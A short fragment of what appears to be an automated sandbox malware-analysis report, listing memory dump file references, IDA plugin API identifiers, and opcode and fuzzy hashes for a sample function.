            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: lstrlen$CharNextlstrcmpi
            • String ID:
            • API String ID: 190613189-0
            • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
            • Instruction ID: b09c91cad7c2282b041c35ea214dbdd3f15ee75aa50bf55fe933874c09a5e2ef
            • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
            • Instruction Fuzzy Hash: BFF0F631104954FFD702DFA5DD04E9FBBA8EF06350B2180BAE841F7210D674DE01ABA8